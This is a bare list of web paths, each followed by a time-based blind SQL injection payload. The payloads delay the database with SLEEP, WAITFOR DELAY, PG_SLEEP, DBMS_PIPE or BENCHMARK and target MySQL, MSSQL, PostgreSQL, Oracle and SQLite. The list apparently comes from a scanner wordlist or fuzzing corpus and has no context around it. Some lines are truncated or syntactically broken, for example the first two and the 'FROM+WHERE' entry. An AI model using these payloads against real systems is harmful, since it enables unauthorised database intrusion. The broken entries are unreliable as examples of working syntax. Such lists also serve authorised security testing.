/index.php?id=1'|And(Select*From(Select(
/api/users?search=test'|And(Select*From(Select(
/view.php?type=1'|+AND+7110=DBMS_PIPE.RECEIVE_MESSAGE(CHR(101),2)--
/api/v1/products?search=test"|;WAITFOR DELAY '0:0:2'--
/api/items?cat=1|+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))x)
/dashboard.php?id=1'|+AND+(SELECT+7544+FROM+(SELECT(SLEEP(3)))kNzZ)+AND+'vjXn'='vjXn
/api/v2/news?id=1'|;SELECT+PG_SLEEP(2)--
/products.php?id=1'|XOR(SELECT(6217)FROM(SELECT(SLEEP(2)))a)XOR'b
/index.php?user=admin'|+AND+9539=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(200000000/2))))--
/admin/login.php?id=1'|--_$$__$__$$_SELECT+*+FROM+dbms_lock.sleep(2)--
/api/v3/auth?user=1'|-(SELECT+0+FROM+WHERE+EXISTS(SELECT+1+FROM+PG_SLEEP(2)))-'
/index.php?cat=1|+AND+2254=BENCHMARK(2000000,MD5(1))--
/main.php?id=1'|+AND+(SELECT+ANALYZE(2))--
/api/search?q=test'|UNION+SELECT+sleep(2),2,3--
/view/item.php?id=1|+AND+7754=DBMS_PIPE.RECEIVE_MESSAGE(65,2)
/store.php?id=1'|-(SELECT+6345+FROM+(SELECT(SLEEP(2)))a)-'
/api/posts?id=1)|+AND+SLEEP(2)+AND+(1182=1182
/index.php?id=1|+OR+2+BETWEEN+1+AND+BENCHMARK(2000000,MD5(1))--
/api/v1/details?id=1'|--_$$__$__$$_SELECT+*+FROM+sys.sleep(2)--
/catalog.php?id=1|+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))AND_5=5
